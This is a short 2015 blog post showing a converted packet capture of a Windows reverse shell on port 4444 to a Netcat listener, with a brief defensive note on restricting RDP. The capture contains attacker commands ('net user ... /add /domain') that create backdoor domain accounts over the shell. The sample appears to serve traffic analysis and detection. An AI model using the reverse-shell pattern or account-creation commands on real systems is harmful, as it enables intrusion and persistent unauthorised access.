Converted PCAP sample of a Microsoft Windows Reverse Shell

By | August 22, 2015

Converted PCAP sample of a Microsoft Windows Reverse Shell, the shell is spawned on port 4444, the hacked PC initiates the connection to 192.168.1.109 which has a Netcat listener waiting on port 4444 to spawn a command line shell on connect. You can see once the shell is spawned a user is created and added to the domain. This style of reverse shell is not seen as much as it once was, in the older days many individuals and companies ran Remote Desktop on port 3389 and left it open to the public allowing hackers to create users and login directly to the machine as if they were there. If you are going to run RDP, you need to make sure you ACL it to only your internal network or trusted users and use encryption.

 

2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L…….
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 1:37, ack 1, win 238, length 36
E..L……
.#…sQ…….P…….Microsoft Windows [Version 6.0.6001]
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 16551, length 0
.#.(7.@.x.. .
.<..s……Q…P……….
2015-01-19 12:37:15 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [.], ack 37, win 1651, length 0
.#.(.@.x.. .
.<..s……QP.@…..
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 248, length 80
E..x..@…..
…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:37:15 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 37:117, ack 1, win 252, length 66
E..x..@…..
.#…sQ…….P…….
Copyright (c) 2006 Microsoft Corporation. All rights reserved.

C:\Windows>
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 1:49, ack 117, win 16531, length 48
.#.X7.@.x….
.<..s……Q..0P.@…..net user Chris.James Pwnz3d /add /domain
2015-01-19 12:39:19 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 49:51, ack 117, win 16534, length 2
.#.*7.@.x….
.<..s……Q..0P.@…..
….
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:33 IP 192.168.1.109.40033 > 192.168.1.104.4444: Flags [P.], seq 51:100, ack 180, win 16515, length 49
.#.Y7.@.x….
.<..s……Q..oP.@…..net user Josh.Brown Pwnz3d /add /domain
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.

C:\Windows>
2015-01-19 12:39:50 IP 192.168.1.104.4444 > 192.168.1.109.40033: Flags [P.], seq 333:385, ack 152, win 258, length 52
E..\!.@….
.#…sQ…….P…….The command completed successfully.

Share Button

Leave a Reply

Your email address will not be published. Required fields are marked *